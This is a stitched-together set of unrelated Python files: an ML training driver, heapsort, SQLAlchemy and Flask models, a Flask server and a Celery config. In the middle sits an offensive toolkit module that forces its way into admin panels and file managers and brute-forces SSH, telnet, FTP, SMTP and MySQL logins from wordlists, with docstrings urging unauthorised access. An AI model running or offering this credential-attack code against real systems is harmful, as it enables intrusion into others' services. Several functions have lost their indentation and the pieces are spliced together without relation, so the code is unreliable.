        y_true.extend(targets.cpu().data.numpy().tolist())
        y_pred.extend(predicted.cpu().data.numpy().tolist())
    test_accuracy = correct / total
    test_confusion_matrix = confusion_matrix(y_true, y_pred)
    t1 = config['t1']
    # Diagonal sums over the big-class (first t1) rows vs all of their samples.
    big_class_acc = np.sum([test_confusion_matrix[i, i] for i in range(t1)]) / np.sum(test_confusion_matrix[:t1])
    if t1 == 10:
        small_class_acc = None
    else:
        small_class_acc = \
            np.sum([test_confusion_matrix[i, i] for i in range(10)[t1:]]) / np.sum(test_confusion_matrix[t1:])
    return test_accuracy, big_class_acc, small_class_acc, test_confusion_matrix
def run_train_models():
    """End-to-end experiment driver.

    Parses ``key=value`` CLI arguments (data, model, t1, R, weight ratio),
    builds the imbalanced train/test splits, trains with weighted sampling,
    saves the model, and reports accuracies and confusion matrices.
    """
    data_option = sys.argv[1].split('=')[1]
    model_option = sys.argv[2].split('=')[1]
    t1 = int(sys.argv[3].split('=')[1])  # number of "big" classes
    R = sys.argv[4].split('=')[1]  # imbalance ratio, or 'inf'
    weight_ratio = int(sys.argv[5].split('=')[1])
    print('weight ratio', weight_ratio)
    config = {'dir_path': '/path/to/working/dir', 'data': data_option, 'model': model_option,
              't1': t1, 'R': R, 'fixed': 'small', 'simple_train_batch_size': 128, 'simple_test_batch_size': 100,
              'epoch_num': 350, 'lr': 0.1, 'momentum': 0.9, 'weight_decay': 5e-4, 'weight_ratio': weight_ratio}
    # fixed: big/small
    if data_option == 'fashion_mnist':
        config['color_channel'] = 1
    else:
        config['color_channel'] = 3
    # Per-class sample sizes: 'inf' means the small classes are dropped.
    if R == 'inf':
        config['big_class_sample_size'] = 5000
        config['small_class_sample_size'] = 0
    else:
        R = int(R)
        if data_option == 'cifar10':
            config['big_class_sample_size'] = 5 * R
            config['small_class_sample_size'] = 5
        elif data_option == 'fashion_mnist':
            config['big_class_sample_size'] = 6 * R
            config['small_class_sample_size'] = 6
        else:
            print('wrong data option')
    model_path = config['dir_path'] + '/models/' + config['data'] + '_' + config['model'] + '_t1=' + \
                 str(config['t1']) + '_R=' + config['R'] + '_' + config['fixed'] + '_' + str(config['weight_ratio']) \
                 + '.pt'
    # Re-seed before every data step so runs are reproducible.
    print('save test data')
    set_random_seed(666)
    save_test_data(config)
    print('save train data')
    set_random_seed(666)
    save_train_data(config)
    set_random_seed(666)
    print('load data from pickle')
    train_data, test_data = load_data_from_pickle(config)
    weighted_idx = get_weighted_idx(train_data, config)
    config['weighted_idx'] = weighted_idx
    print('weighted idx', weighted_idx)
    print('build model')
    model, loss_function, optimizer = build_model(config)
    print('train model')
    simple_train_batch(train_data, model, loss_function, optimizer, config)
    print('save model')
    torch.save(model.state_dict(), model_path)
    print('load model')
    model.load_state_dict(torch.load(model_path))
    train_res, train_big, train_small, train_confusion_matrix = simple_test_batch(train_data, model, config)
    test_res, test_big, test_small, test_confusion_matrix = simple_test_batch(test_data, model, config)
    print('train accuracy', train_res, train_big, train_small)
    print('test accuracy', test_res, test_big, test_small)
    print('train confusion matrix\n', train_confusion_matrix)
    print('test confusion matrix\n', test_confusion_matrix)
if __name__ == '__main__':
    run_train_models()
|
#Heapsort
#15.7.20
#chuanlu
import math
def right(i):
    """Index of the right child of node i in a 0-based heap."""
    return 2 * i + 2
def left(i):
    """Index of the left child of node i in a 0-based heap."""
    return i * 2 + 1
def parent(i):
    """Index of the parent of node i in a 0-based heap.

    Fix: with children at 2i+1 / 2i+2 the parent is (i-1)//2; the old
    floor(i/2) was wrong for even indices (e.g. parent(2) returned 1
    instead of 0), corrupting heap_increase_key's sift-up.
    """
    return (i - 1) // 2
def heapsize(A):
    # NOTE(review): the original (Chinese) comment says the number of valid
    # heap elements equals len(A), but the code returns len(A) - 1 — confirm
    # which is intended; this helper is unused elsewhere in the file.
    return len(A) - 1
def max_heapify(A, i, x):
    """Sift A[i] down so the subtree rooted at i satisfies the max-heap
    property; only the first x elements count as part of the heap."""
    size = x
    largest = i
    l = left(i)
    r = right(i)
    if l < size and A[l] > A[i]:
        largest = l
    if r < size and A[r] > A[largest]:
        largest = r
    if largest != i:
        A[i], A[largest] = A[largest], A[i]
        max_heapify(A, largest, size)
    return A
def min_heapify(A, i, x):
    """Sift A[i] down so the subtree rooted at i satisfies the MIN-heap
    property; only the first x elements count as part of the heap.

    Fixes: the comparisons used '>' (copied from max_heapify), the bounds
    used '<=' (which can index one past the heap), and the recursion
    called max_heapify with a missing size argument.
    """
    l = left(i)
    r = right(i)
    A_heapsize = x
    if l < A_heapsize and A[l] < A[i]:
        smallest = l
    else:
        smallest = i
    if r < A_heapsize and A[r] < A[smallest]:
        smallest = r
    if smallest != i:
        A[i], A[smallest] = A[smallest], A[i]
        min_heapify(A, smallest, A_heapsize)
    return A
def build_max_heap(A, A_heapsize):
    """Rearrange A in place into a max-heap over its first A_heapsize items."""
    # Heapify bottom-up from the middle of the array to the root.
    for node in range(len(A) // 2, -1, -1):
        max_heapify(A, node, A_heapsize)
    return A
def heap_sort(A, A_heapsize):
    # In-place heapsort: build a max-heap, then repeatedly swap the root
    # (current maximum) to the end and re-heapify the shrunken prefix.
    build_max_heap(A, A_heapsize)
    print(A)  # debug: show the heap before sorting
    for i in range(len(A) - 1, 0, -1):
        A[0], A[i] = A[i], A[0]
        A_heapsize -= 1
        max_heapify(A, 0, A_heapsize)
    return A
#Priority Queue
def heap_extract_max(A, A_heapsize):
    """Remove and return the maximum element (the root) of max-heap A.

    Fix: on underflow the original only printed a message and then read
    A[0] anyway; raise instead so callers cannot get a bogus result.
    """
    if A_heapsize < 1:
        raise IndexError('Error: Heap Underflow')
    A_max = A[0]
    # Move the last in-heap element to the root and sift it down.
    A[0] = A[A_heapsize - 1]
    A_heapsize -= 1
    max_heapify(A, 0, A_heapsize)
    return A_max
def heap_maximum(A):
    """Return (without removing) the largest element of max-heap A: its root."""
    root = A[0]
    return root
def heap_increase_key(A, i, key):
    """Raise A[i] to `key` and sift it up to restore the max-heap property.

    Fix: a key smaller than the current value now raises ValueError;
    previously the code only printed a warning and then assigned the
    smaller key anyway, silently corrupting the heap.
    """
    if key < A[i]:
        raise ValueError('Error: No key is smaller than current key')
    A[i] = key
    # Bubble the increased key up while it exceeds its parent.
    while i > 0 and A[parent(i)] < A[i]:
        A[i], A[parent(i)] = A[parent(i)], A[i]
        i = parent(i)
    return A
def max_heap_insert(A, key, A_heapsize):
    """Insert `key` into max-heap A (A_heapsize = current element count)."""
    # Append a -inf sentinel, then raise it to `key` so the sift-up logic
    # in heap_increase_key places it correctly.
    sentinel = float('-inf')
    A.append(sentinel)
    heap_increase_key(A, A_heapsize, key)
    return A
def heap_delete(A, i, A_heapsize):
    """Delete A[i] from the max-heap in O(lg n).

    Fix: the original used ``A.pop(i)``, which shifts every later element
    one slot left and scrambles parent/child relationships across the
    whole heap.  Instead, overwrite slot i with the last in-heap element,
    drop the tail, and restore the heap property around slot i.
    """
    last = A_heapsize - 1
    A[i] = A[last]
    A.pop()
    if i < last:
        # The moved element may be too large for its new spot (sift up)
        # or too small (sift down); parent index computed inline as (i-1)//2.
        while i > 0 and A[(i - 1) // 2] < A[i]:
            A[i], A[(i - 1) // 2] = A[(i - 1) // 2], A[i]
            i = (i - 1) // 2
        max_heapify(A, i, last)
    return A
# Demo / manual tests: build a heap, then exercise one operation at a time.
A = [1,2,3,4,5,6,7,8,9]
A_heapsize = len(A)
A = build_max_heap(A, A_heapsize)
#print(A)
#print(heap_sort(A, A_heapsize))
#print(heap_extract_max(A, A_heapsize))
#print(heap_increase_key(A, 2, 10))
#print(max_heap_insert(A, 12345, A_heapsize))
print(heap_delete(A, 5, A_heapsize))
from sqlalchemy import Column, Integer, String
from . import Base
class Instrument(Base):
    """
    Map class for table instrument.
    - **instrument_id**: Integer, primary_key.
    - **instrument_type**: String(50), not null.
    Note:
        https://rszalski.github.io/magicmethods/
    """
    __tablename__ = "instrument"
    instrument_id = Column(Integer, primary_key = True)
    instrument_type = Column(String(50), nullable = False)
    def __init__(self, instrument_type):
        """
        Constructor method.
        Args:
            - instrument_type (str): Type of financial instrument.
        """
        self.instrument_type = instrument_type
    def __repr__(self):
        return "<Instrument(instrument_type={})>".format(self.instrument_type)
    def to_dict(self):
        """
        As the name tells, it returns attributes in a dict form.
        Note:
            The __dict__ method is not overridable.
        """
        return {"instrument_id" : self.instrument_id,
                "instrument_type" : self.instrument_type
                }
    def __eq__(self, other):
        """
        Overrides the default implementation.
        Reference:
            https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
        """
        if isinstance(self, other.__class__):
            return self.to_dict() == other.to_dict()
        return False
    def __ne__(self, other):
        """
        Overrides the default implementation.
        """
        return not self.__eq__(other)
    def __lt__(self, other):
        """
        Overrides the default implementation.
        Ordering compares instrument_type only.
        """
        if isinstance(self, other.__class__):
            return self.instrument_type < other.instrument_type
        return NotImplemented
    def __le__(self, other):
        """
        Overrides the default implementation.
        """
        if isinstance(self, other.__class__):
            return self.instrument_type <= other.instrument_type
        return NotImplemented
    def __gt__(self, other):
        """
        Overrides the default implementation.
        """
        if isinstance(self, other.__class__):
            return self.instrument_type > other.instrument_type
        return NotImplemented
    def __ge__(self, other):
        """
        Overrides the default implementation.
        """
        if isinstance(self, other.__class__):
            return self.instrument_type >= other.instrument_type
        return NotImplemented
    def __hash__(self):
        """
        Overrides the default implementation.
        Hash is derived from the sorted attribute items so equal objects hash equally.
        """
        return hash(tuple(sorted(self.to_dict().items())))
|
from . import db
from werkzeug.security import generate_password_hash,check_password_hash
from . import login_manager
from flask_login import login_required
from flask_login import UserMixin
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from flask import current_app
'''#保护路由只让认证用户访问
@app.route('/secret')
@login_required
def secret():
return 'Only authenticated users are allowed!'
'''
class Role(db.Model):
    """Role lookup table; one Role row owns many User rows."""
    __tablename__ = 'roles' # table name
    id = db.Column(db.Integer,primary_key=True)
    name = db.Column(db.String(64),unique = True)
    users = db.relationship('User',backref = 'role')
    # db.relationship() builds a one-to-many link between the two tables: one
    # Role can map to many actual users in the `users` table.  The "many"
    # side carries the foreign key pointing back at the "one" side
    # (User.role_id).  backref defines the reverse relationship (user.role).
    def __repr__(self):
        return '<Role %s>' % self.name # readable model representation
class User(UserMixin,db.Model):
    """User account model with password hashing and email-confirmation tokens."""
    __tablename__ = 'users'
    id = db.Column(db.Integer,primary_key=True)
    #email = db.Column(db.String(64),unique=True,index=True)
    #name = db.Column(db.String(64),unique = True,index=True)
    # (the disabled variants above forbade duplicates and added an index)
    email = db.Column(db.String(64),index=True)
    name = db.Column(db.String(64),index=True)
    password_hash=db.Column(db.String(128))
    confirmed = db.Column(db.Boolean,default = False) # whether the email is confirmed
    role_id = db.Column(db.Integer,db.ForeignKey('roles.id')) # link to the roles table
    @property # reading the plain-text password is forbidden
    def password(self):
        raise AttributeError('password is not a readable attribute')
    @password.setter # assigning to password stores only its hash
    def password(self,password):
        self.password_hash = generate_password_hash(password) # store the hash
    def verify_password(self,password):
        # Check a candidate password against the stored hash.
        return check_password_hash(self.password_hash,password)
    def __repr__(self):
        return '<User %s>' % self.name
    # Account confirmation
    # Generate a signed token embedding this user's id (default expiry 1 h).
    def generate_confirmation_token(self,expiration=3600):
        s = Serializer(current_app.config['SECRET_KEY'],expiration)
        return s.dumps({'confirm':self.id}) # store self.id under 'confirm'
    # Verify the token and mark the account as confirmed.
    def confirm(self,token):
        s = Serializer(current_app.config['SECRET_KEY'])
        try:
            data = s.loads(token.encode('utf-8'))
        except Exception:
            # Fix: was a bare `except:`, which also swallowed SystemExit /
            # KeyboardInterrupt. Any bad/expired signature means "not confirmed".
            return False
        if data.get('confirm') != self.id: # reject tokens issued for another user
            return False
        self.confirmed = True
        db.session.add(self)
        return True
#要使用Flask-Login扩展,你必须在数据库模型文件(models.py)中提供一个回调函数user_loader,
#这个回调函数用于从会话中存储的用户ID重新加载用户对象。它应该接受一个用户的id作为输入,返回相应的用户对象。
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login callback: reload the User for the id stored in the session.

    Returns None for a malformed id.  Fix: the bare ``except`` also hid
    database errors (and SystemExit); only the int() conversion failure is
    an expected, recoverable condition here.
    """
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return None
    return User.query.get(uid)
"""server file for she owns"""
import os
from flask import Flask, render_template, redirect, request, jsonify
from sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound
from flask_debugtoolbar import DebugToolbarExtension
from jinja2 import StrictUndefined
from model import Business, Category, connect_to_db
app = Flask(__name__)
# For usage of flask sessions and debug toolbar.
# NOTE(review): "IN_DEV" is a placeholder secret — replace before production.
app.secret_key = "IN_DEV"
# StrictUndefined raises errors for undefined variables, otherwise jinja
# does not give us an error, but fails silently
app.jinja_env.undefined = StrictUndefined
# auto-reloads changes we made, so we don't have to reload manually everytime
# we make a little change
app.jinja_env.auto_reload = True
# Google Maps API Key (read from the environment, never hard-coded)
google_maps_key = os.environ.get("GMaps_Key")
# add Google Maps API Key to global scope (all templates have access now)
app.add_template_global(google_maps_key, "google_maps_key")
@app.route("/")
def index():
    """Render the index (home) page."""
    return render_template("index.html")
@app.route("/business-map")
def display_map():
    """Display a map with businesses based on the selected category."""
    return render_template("map_results.html")
@app.route("/businesses/<int:business_id>")
def show_business_details(business_id):
    """Show detailed information about a selected business."""
    business = Business.get_business_by_id(business_id)
    return render_template("business_details.html", business=business)
# ------------------------------- JSON ROUTES ------------------------------- #

@app.route("/getBusinessInfo.json")
def get_business_info():
    """Return a JSON element with businesses associated to the given category."""
    category = request.args.get("searchTerm", "")
    try:
        # get category object with search term
        category_object = Category.get_category_by_name(category)
    except NoResultFound:
        return jsonify({"data": "Can't find matches"})
    # getting businesses associated with the selected category
    try:
        businesses = category_object.categories_business
    # when we have multiple matches, we get a list -> categories_business throws
    # AttributeError (a list does not have that attribute)
    except AttributeError:
        # todo: turn list of objects into one big object to pass to JS
        return jsonify({"data": "Can't find matches"})
    return jsonify(Business.serialize_business_object(businesses))
if __name__ == "__main__":
    # Setting debug=True here, since it has to be True at the
    # point that we invoke the DebugToolbarExtension.
    app.debug = True
    # Use the DebugToolbar.
    DebugToolbarExtension(app)
    # Bind the SQLAlchemy models to this app before serving.
    connect_to_db(app)
    app.run(host="0.0.0.0")
from datetime import timedelta
import djcelery

# Register django-celery's loader so Django settings drive Celery configuration.
djcelery.setup_loader()

# Redis serves as both the message broker and the result backend (separate DBs).
BROKER_BACKEND = "redis"
BROKER_URL = 'redis://119.3.4.159:6379/1'
CELERY_RESULT_BACKEND = 'redis://119.3.4.159:6379/2'

# Task queues: separate queues distinguish the different task types.
CELERY_QUEUES = {
    "beat_tasks": {
        "exchange": "beat_tasks",
        "exchange_type": "direct",
        "binding_key": "beat_tasks",
    },
    "work_queue": {
        "exchange": "work_queue",
        "exchange_type": "direct",
        "binding_key": "work_queue",
    },
}

# Default queue used when a task does not specify one.
CELERY_DEFAULT_QUEUE = "work_queue"

# Task registration: the tasks module of the "celerytask" app.
CELERY_IMPORTS = (
    "celerytask.tasks",
)

# Can prevent deadlocks in some situations.
CELERYD_FORCE_EXECV = True

# Number of concurrent worker processes.
CELERYD_CONCURRENCY = 4

# Acknowledge late so failed tasks can be retried.
CELERY_ACKS_LATE = True

# Each worker executes at most 100 tasks before being replaced — guards
# against memory leaks.
CELERYD_MAX_TASKS_PER_CHILD = 100

# Maximum runtime of a single task; it is terminated on timeout.
CELERYD_TASK_TIME_LIMIT = 12 * 30

# Periodic ("beat") task schedule.
CELERYBEAT_SCHEDULE = {
    'task1': {
        'task': 'beat-task',
        'schedule': timedelta(seconds=5),
        # 'args': (2, 6),
        'options': {  # queue used for this scheduled task
            'queue': 'beat_tasks',
        }
    }
}
|
import requests,pexpect,random,smtplib,telnetlib,sys,os
from ftplib import FTP
import paramiko
from paramiko import SSHClient, AutoAddPolicy
import mysql.connector as mconn
from payloads import *
def access(u,timeout=10,bypass=False,proxy=None):
    '''
    Check whether the given link returns a usable "200 OK" response.

    Arguments:
        u: the targeted link
        timeout: (default 10) timeout flag for the request
        bypass: (default False) append "#" to the link to bypass naive
                anti-crawler filters
        proxy: optional "ip:port" HTTP proxy

    usage:
    >>>import bane
    >>>url='http://www.example.com/admin/'
    >>>url+='edit.php'
    >>>a=bane.access(url)
    >>>if a==True:
    ...  print 'accessible'
    '''
    if bypass==True:
        u+='#'
    if proxy:
        proxy={'http':'http://'+proxy}
    try:
        r=requests.get(u, headers = {'User-Agent': random.choice(ua)} , allow_redirects=False,proxies=proxy,timeout=timeout)
        if r.status_code == requests.codes.ok:
            # BUG FIX: the original used "or", which is true whenever at least
            # one error marker is absent — i.e. almost always. "and" requires
            # BOTH markers to be absent before declaring the page accessible.
            if (("Uncaught exception" not in r.text) and ("404 Not Found" not in r.text)):
                return True
    except Exception as e:
        pass
    return False
"""
in functions below you can use a proxy in any function that takes the 'proxy' parameter with this way:
example:
proxy='192.122.58.47:80'
"""
def filemanager(u,logs=True,mapping=False,returning=False,timeout=10,proxy=None):
'''
if you are lucky and smart enough, using google dorking you can gain an unauthorised access to private file managers and manipulate files
(delete, upload, edit...) and exploit this weakness on the security of the target for further purposes.
this funtion try to gain access to any giving website's filemanager by bruteforcing the links (list called "filemanager") and trying to get
200 ok response directly without redirectes which indicates in most of the cases to an unprotected accessebleb filemanager.
the function takes the following arguments:
u: the link: http://www.example.com
logs: (set by default to True) the show the process and requests
mapping: (set by default to: False) if it is set to True, it will stop the prcess when it finds the link, else: it continue for more
possible links
returning: (set by default to: False) if you want it to return a list of possibly accesseble links to be used in your scripts set it to: True
timeout: (set by default to 10) timeout flag for the requests
usage:
>>>import bane
>>>url='http://www.example.com/'
>>>bane.filemanager(url)
>>>bane.filemanager(url,returning=True,mapping=False)
'''
k=[]
if proxy:
proxy={'http':'http://'+proxy}
for i in manager:
try:
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
g=u+i
if logs==True:
print'[*]Trying:',g
r=requests.get(g, headers = {'User-Agent': random.choice(ua)} , allow_redirects=False,proxies=proxy,timeout=timeout)
if r.status_code == requests.codes.ok:
if (("Uncaught exception" not in r.text) or ("404 Not Found" not in r.text)):
if logs==True:
print'[+]FOUND!!!'
k.append(g)
if mapping==False:
break
else:
if logs==True:
print'[-]Failed'
else:
if logs==True:
print'[-]Failed'
except KeyboardInterrupt:
break
except Exception as e:
pass
if returning==True:
return k
def forcebrowsing(u,timeout=10,logs=True,returning=False,mapping=True,ext='php',proxy=None):
    '''
    Uses the "Forced Browsing" technique, which aims to access restricted
    areas without providing any credentials. Here it tries to reach admin
    pages by appending known path guesses (module-level list "innerl") to the
    given URL.

    Arguments:
        u: the targeted link, which should lead to the control panel, e.g.
           http://www.example.com/admin/login.php
           — drop 'login.php' and pass the rest:
           >>>import bane
           >>>bane.forcebrowsing('http://www.example.com/admin/')
           then the function tries possible accessible links such as:
           http://www.example.com/admin/edit.php
           http://www.example.com/admin/news.php
           http://www.example.com/admin/home.php
        timeout: (default 10) timeout flag for the request
        logs: (default True) show the progress of the attack
        returning: (default False) return the list of accessible link(s)
        mapping: (default True) find all possible links; set to False to stop
                 at the first hit
        ext: (default "php") extension appended to each guess; currently only
             "php", "asp" and "aspx" are meaningful.
    '''
    if proxy:
        proxy={'http':'http://'+proxy}
    l=[]
    # Strip one trailing slash before appending candidate paths.
    if u[len(u)-1]=='/':
        u=u[0:len(u)-1]
    for x in innerl:
        g=u+x+'.'+ext
        if logs==True:
            print'[*]Trying:',g
        try:
            h=access(g,proxy=proxy)
        except KeyboardInterrupt:
            break
        if h==1:  # access() returns a bool; True == 1
            l.append(g)
            if logs==True:
                print'[+]FOUND!!!'
            if mapping==False:
                break
        else:
            if logs==True:
                print'[-]Failed'
    if returning==True:
        return l
def adminlogin(u,p,timeout=10,proxy=None):
    '''
    POST the given credentials to a login page and report whether they were
    accepted, judged by a 302 redirect response.

    Arguments:
        u: login link
        p: dict of input names and values: {input name : value},
           e.g. {'user':'ala','pass':'ala'}
        timeout: (default 10) timeout flag for the request
    usage:
    >>>import bane
    >>>a=bane.adminlogin('http://www.example.com/admin/login.php',{'user':'ala','pass':'ala'})
    >>>if a==True:
    ...  print 'logged in!!!'
    '''
    if proxy:
        proxy={'http':'http://'+proxy}
    try:
        r=requests.post(u,data=p,headers = {'User-Agent': random.choice(ua)},allow_redirects=False,proxies=proxy,timeout=timeout)
        # NOTE(review): a 302 after a login POST usually means success, but
        # some sites redirect on failure too — heuristic only.
        if r.status_code==302:
            return True
    except:
        pass
    return False
def adminpanel(u,logs=True,mapping=False,returning=False,ext='php',timeout=10,proxy=None):
'''
this function use a list of possible admin panel links with different extensions: php, asp, aspx, js, /, cfm, cgi, brf and html.
ext: (set by default to: 'php') to define the link's extention.
usage:
>>>import bane
>>>bane.adminpanel('http://www.example.com',ext='php',timeout=7)
>>>bane.adminpanel('http://www.example.com',ext='aspx',timeout=5)
'''
if proxy:
proxy={'http':'http://'+proxy}
links=[]
ext=ext.strip()
if ext.lower()=="php":
links=phpl
elif ext.lower()=="asp":
links=aspl
elif ext.lower()=="aspx":
links=aspxl
elif ext.lower()=="js":
links=jsl
elif ext=="/":
links=slashl
elif ext.lower()=="cfm":
links=cfml
elif ext.lower()=="cgi":
links=cgil
elif ext.lower()=="brf":
links=brfl
elif ext.lower()=="html":
links=htmll
k=[]
for i in links:
try:
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
g=u+i
if logs==True:
print'[*]Trying:',g
r=requests.get(g,headers = {'User-Agent': random.choice(ua)},allow_redirects=False,proxies=proxy,timeout=timeout)
if r.status_code == requests.codes.ok:
if logs==True:
print'[+]FOUND!!!'
k.append(g)
if mapping==False:
break
else:
if logs==True:
print'[-]failed'
except KeyboardInterrupt:
break
except Exception as e:
if logs==True:
print '[-]Failed'
if returning==True:
return k
'''
the next functions are used to check the login credentials you provide, it can be used for bruteforce attacks.
it returns True if the given logins, else it returns False.
example:
>>>host='125.33.32.11'
>>>wordlist=['admin:admin','admin123:admin','user:password']
>>>for x in wordlist:
user=x.split(':')[0]
pwd=x.split(':')[1]
print '[*]Trying:',user,pwd
if ssh1(host,username=user,password=pwd)==True:
print'[+]Found!!!'
else:
print'[-]Failed'
'''
def smtp(u, p=25,username='',password='',ehlo=True,helo=False,ttls=False):
    """Try to authenticate against an SMTP server; True on success.

    u/p: host and port; ehlo/helo: which greeting(s) to send;
    ttls: upgrade the session with STARTTLS before logging in.

    FIX: the original called starttls() twice when ttls=True; the second call
    fails on an already-encrypted session and the broad except turned every
    TLS login attempt into False regardless of the credentials.
    """
    try:
        s= smtplib.SMTP(u, p)
        if ehlo==True:
            s.ehlo()
        if ttls==True:
            s.starttls()
        if helo==True:
            s.helo()
        s.login(username, password)
        return True
    except Exception as e:
        pass
    return False
def telnet1(u,p=23,username='',password='',timeout=5):
    """Try a telnet login via pexpect (POSIX only); True when a shell prompt
    from the module-level "prompts" list appears after authentication."""
    p='telnet {} {}'.format(u,p)  # NOTE: rebinds the port arg as the command line
    try:
        child = pexpect.spawn(p)
        # Answer the login/password prompts as they appear.
        while True:
            child.expect(['.*o.*'],timeout=timeout)
            c= child.after
            if 'ogin' in c:
                child.send(username+'\n')
            elif "assword" in c:
                child.send(password+'\n')
                break
        # Success when the post-login output contains a known shell prompt.
        child.expect('.*@.*',timeout=timeout)
        c= child.after
        for x in prompts:
            if x in c:
                return True
    except Exception as e:
        pass
    return False
def telnet2(u,p=23,username='',password='',prompt='$',timeout=5):
    """Try a telnet login with the stdlib telnetlib; True when the post-login
    output contains one of the module-level "prompts".

    NOTE(review): Python-2 style — telnetlib on Python 3 requires bytes, not
    str, for read_until/write.
    """
    try:
        t = telnetlib.Telnet(u,p,timeout=timeout)
        t.read_until(":",timeout=timeout)   # wait for the "login:" prompt
        t.write(username + "\n")
        t.read_until(":",timeout=timeout)   # wait for the "Password:" prompt
        t.write(password + "\n")
        c= t.read_until(prompt,timeout=timeout)
        for x in prompts:
            if x in c:
                return True
    except Exception as e:
        pass
    return False
def ssh1(u,p=22,username='',password='',timeout=5):
    """Try an SSH login by driving the ssh client with pexpect (POSIX only);
    True when a known shell prompt appears after authentication."""
    p='ssh -p {} {}@{}'.format(p,username,u)  # NOTE: rebinds the port arg as the command line
    try:
        child = pexpect.spawn(p)
        # Answer host-key confirmation and login/password prompts as they appear.
        while True:
            child.expect(['.*o.*'],timeout=timeout)
            c= child.after
            if "yes/no" in c:
                child.send('yes\n')   # accept the unknown host key
            elif 'ogin' in c:
                child.send(username+'\n')
            elif "assword" in c:
                child.send(password+'\n')
                break
        # Success when the post-login output contains a known shell prompt.
        child.expect('.*@.*',timeout=timeout)
        c= child.after
        for x in prompts:
            if x in c:
                return True
    except Exception as e:
        pass
    return False
def ssh2(ip,username='',password='',p=22,timeout=5):
    """Try an SSH login with paramiko and verify it by echoing a marker.

    Returns True when the credentials are accepted and the remote echo comes
    back; False otherwise.

    FIX: the original never closed the SSHClient, leaking one connection per
    successful call.
    """
    try:
        s = SSHClient()
        s.set_missing_host_key_policy(AutoAddPolicy())  # accept unknown host keys
        s.connect(ip, p,username=username, password=password,timeout=timeout)
        try:
            stdin, stdout, stderr = s.exec_command ("echo alawashere",timeout=timeout)
            r=stdout.read()
            if "alawashere" in r:
                return True
        finally:
            s.close()
    except Exception as e:
        pass
    return False
def ftpanon(ip,timeout=5):
    """Return True when the FTP server accepts anonymous login.

    FIX: the original never closed the control connection it opened.
    """
    try:
        ftp = FTP(ip,timeout=timeout)
        try:
            ftp.login()
            return True
        finally:
            ftp.close()
    except Exception as e:
        pass
    return False
def ftp(ip,username='',password='',timeout=5):
    """Return True when the FTP server accepts the given credentials.

    FIXES: removed the unused local "i=False" and closed the control
    connection, which the original leaked on every call.
    """
    try:
        conn = FTP(ip,timeout=timeout)
        try:
            conn.login(username,password)
            return True
        finally:
            conn.close()
    except Exception as e:
        pass
    return False
def mysql(u,username='root',password=''):
    """Return True when the MySQL server accepts the given credentials.

    FIX: the original never closed the connection it opened, leaking one
    socket per successful attempt.
    """
    try:
        conn = mconn.connect(host=u,user=username, password=password)
        conn.close()
        return True
    except Exception as e:
        pass
    return False
def hydra(u,proto="ssh",p=22,wl=[],logs=True,returning=False,mapping=False,timeout=5,ehlo=False,helo=True,ttls=False):
    '''
    Hydra-like tool to bruteforce credentials on different services.

    proto: (default: "ssh") the protocol to attack (ftp, ssh, telnet, smtp,
    mysql) — don't forget to set the matching port "p".
    wl: wordlist of "user:password" strings.
    Returns "host:user:password" for the first hit when returning=True.

    NOTE(review): wl=[] is a mutable default argument (harmless here since it
    is never mutated), and when proto is none of the supported names "s" is
    never bound, so the first attempt raises NameError — verify intent.
    '''
    o=''
    # pexpect is unavailable on Windows, so use the pure-Python variants there.
    if (sys.platform == "win32") or( sys.platform == "win64"):
        if proto=="ssh":
            s=ssh2
        elif proto=="telnet":
            s=telnet2
    else:
        if proto=="ssh":
            s=ssh1
        elif proto=="telnet":
            s=telnet1
    if proto=="ftp":
        s=ftp
    if proto=="smtp":
        s=smtp
    if proto=="mysql":
        s=mysql
    for x in wl:
        # Each wordlist entry is "user:password".
        user=x.split(':')[0].strip()
        pwd=x.split(':')[1].strip()
        if logs==True:
            print"[*]Trying: {}:{}".format(user,pwd)
        # Call signatures differ per checker, hence the per-protocol dispatch.
        if proto=="mysql":
            r=s(u,user,pwd)
        elif proto=="ftp":
            r=s(u,username=user,password=pwd,timeout=timeout)
        elif proto=="smtp":
            r=s(u,p,username=user,password=pwd,ehlo=ehlo,helo=helo,ttls=ttls)
        else:
            r=s(u,p,username=user,password=pwd,timeout=timeout)
        if r==True:
            if logs==True:
                print"[+]Found!!!"
            if returning==True:
                o="{}:{}:{}".format(u,user,pwd)
            break
        else:
            if logs==True:
                print"[-]Failed"
    if returning==True:
        return o
|
# Brian Hamrick
# 10/16/08
# Ellipse detection
import sys
import copy
import time
import curses
from math import *
from pgm import pgm
from ppm import ppm
# Wall-clock start, used by update_bar() to estimate remaining time.
starttime=time.time()

# Put the terminal into curses mode for the progress display.
stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
stdscr.keypad(1)

# Center the 52-char progress bar and the status/ETA strings on screen.
# NOTE(review): "/" on ints is Python-2 integer division here.
maxy, maxx = stdscr.getmaxyx()
bary, barx = maxy/2+1, (maxx-(52))/2
stry, strx = maxy/2, (maxx-(39))/2
etay, etax = maxy/2, strx + 16
stdscr.erase()
def update_bar(percent,stdscr):
    """Redraw the centered 50-char progress bar, percentage and ETA line.

    percent: progress in [0, 100]; stdscr: the curses window. Uses the
    module-level starttime and the precomputed screen coordinates.

    FIX: builds the bar with string repetition instead of the original
    character-by-character concatenation loop (quadratic, and called inside
    the main search loops).
    """
    global starttime
    # One '=' per full 2% of progress, padded with spaces to 50 chars.
    filled = max(0, min(50, int(percent // 2)))
    bar = '=' * filled + ' ' * (50 - filled)
    stdscr.addstr(stry, strx, 'Progress: ' + str(int(percent)) + '%')
    if percent > 1:
        stdscr.addstr(etay, etax, 'ETA: ' + str(int(float(100-percent)*(time.time() - starttime)/percent)) + ' seconds remaining ')
    stdscr.addstr(bary, barx, '[' + bar + ']')
    stdscr.move(0,0)
    stdscr.refresh()
# Draw the empty progress bar immediately.
update_bar(0,stdscr)

# Canny-style hysteresis thresholds on the Sobel gradient magnitude.
high_threshold = 400
low_threshold = 200

if len(sys.argv) < 2:
    print 'YOU FAIL: NO INPUT FILE'
    sys.exit(0)

infile = sys.argv[1]
outfile = infile[:-4] + '_ellipses.pgm'  # assumes a 3-letter extension, e.g. ".pgm"

# Working copies of the input image.
img = pgm()
img.read(infile)
edges = pgm()
edges.read(infile)
tmp_img = pgm()
tmp_img.read(infile)
